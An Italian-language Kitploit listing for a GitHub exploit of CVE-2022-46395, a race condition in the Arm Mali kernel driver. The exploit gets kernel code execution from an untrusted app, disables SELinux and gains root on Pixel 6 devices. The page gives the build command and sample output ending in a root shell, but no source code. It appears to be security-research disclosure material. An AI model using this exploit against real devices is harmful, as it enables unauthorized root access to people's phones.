Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-46395 — Exploit del kernel Android per CVE-2022-46395 che prende di mira il driver Arm Mali per ottenere l'esecuzione di codice arbitrario, disabilitare SELinux e ottenere i privilegi di root sui dispositivi Pixel 6. | Kitploit
Strumenti/GitHubGitHub/smiletablabo/cve-2022-46395
Sicurezza AndroidEscalation di PrivilegiAnalisi delle VulnerabilitàExploitRed TeamingBinary Exploitation
GitHubsmiletablabo/cve-2022-46395

CVE-2022-46395

Exploit del kernel Android per CVE-2022-46395 che prende di mira il driver Arm Mali per ottenere l'esecuzione di codice arbitrario, disabilitare SELinux e ottenere i privilegi di root sui dispositivi Pixel 6.

Vedi Repository
212 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit per CVE-2022-46395

Il write-up si trova qui. Si tratta di un bug nel driver del kernel Arm Mali che ho segnalato a novembre 2022. Il bug può essere utilizzato per ottenere l'esecuzione arbitraria di codice nel kernel dal dominio di app non fidato, che viene poi utilizzato per disabilitare SELinux e ottenere i permessi di root.

L'exploit è testato su Google Pixel 6 con le patch di novembre 2022 e gennaio 2023. Per riferimento, ho usato il seguente comando per compilare con clang in ndk-21:

root@kitploit:~
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf

L'exploit dovrebbe essere eseguito un paio di minuti dopo l'avvio e probabilmente dovrà funzionare per alcuni minuti per avere successo. Non è raro fallire le race condition centinaia di volte, anche se fallire la race condition non ha alcun effetto negativo e l'exploit nel suo insieme raramente crasha. Se ha successo, dovrebbe disabilitare SELinux e ottenere i permessi di root.

root@kitploit:~
oriole:/ $ /data/local/tmp/mali_user_buf                                       
fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
benchmark_time 357
failed after 100
failed after 200
failed after 300
benchmark_time 343
failed after 400
failed after 500
failed after 600
benchmark_time 337
failed after 700
failed after 800
failed after 900
benchmark_time 334
failed after 1000
failed after 1100
failed after 1200
benchmark_time 363
failed after 1300
finished reset: 190027720 fault: 135735849 772 err 0 read 3
found pgd at page 4
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
result 50
oriole:/ # 
Scarica lo strumento